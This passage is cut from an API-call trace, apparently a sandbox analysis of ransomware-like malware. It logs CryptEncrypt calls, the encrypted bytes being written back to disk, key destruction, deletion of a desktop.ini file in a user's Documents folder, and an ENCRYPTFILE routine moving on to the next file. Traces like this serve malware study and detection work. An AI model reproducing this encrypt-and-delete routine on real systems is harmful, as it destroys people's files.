cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cab68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.924] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0xd8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0xe0) returned 1 [0083.924] CharLowerBuffW (in: lpsz="byte[225]", cchLength=0x9 | out: lpsz="byte[225]") returned 0x9 [0083.925] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.925] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caf88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0083.925] CryptEncrypt (in: hKey=0x41ac740, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x43cc1c8*, pdwDataLen=0x144e538*=0xd8, dwBufLen=0xe0 | out: pbData=0x43cc1c8*, pdwDataLen=0x144e538*=0xe0) returned 1 [0083.925] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0083.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0083.925] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.925] WriteFile (in: hFile=0x258, lpBuffer=0x43ebce8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x43ebce8*, lpNumberOfBytesWritten=0x144ef3c*=0xe0, lpOverlapped=0x0) returned 1 [0083.929] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0083.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0083.930] CryptDestroyKey (hKey=0x41ac740) returned 1 [0084.018] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.018] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0084.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0084.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0084.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0084.018] CryptReleaseContext (hProv=0x41a4480, dwFlags=0x0) returned 1 [0084.018] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0084.018] FreeLibrary (hLibModule=0x756e0000) returned 1 [0084.018] CloseHandle (hObject=0x298) returned 1 [0084.018] CloseHandle (hObject=0x258) returned 1 [0084.020] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini", lpFilePart=0x0) returned 0x2f [0084.020] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\desktop.ini")) returned 0x2 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0084.020] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0x41ac640 [0084.020] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes\\desktop.ini")) returned 1 [0084.022] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0084.022] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0084.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0084.023] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0084.023] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2440 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0084.023] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0084.023] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0084.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0084.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0084.023] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0084.023] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0084.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0084.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0084.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca478 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0084.024] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0084.025] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0084.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0084.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0084.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0084.025] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0084.025] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0084.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0084.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\Favorites.vssx", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1a0f60e, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1a0f60e, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="Favorites.vssx", cAlternateFileName="FAVORI~1.VSS")) returned 0x41ac140 [0084.025] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0084.026] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca298 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.026] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0084.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0084.027] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0084.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0084.027] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0084.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0084.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0084.027] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.027] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0084.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0084.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6e8 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0084.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0084.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0084.028] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0084.028] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0084.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0084.029] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0084.029] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0084.029] RtlAllocateHeap 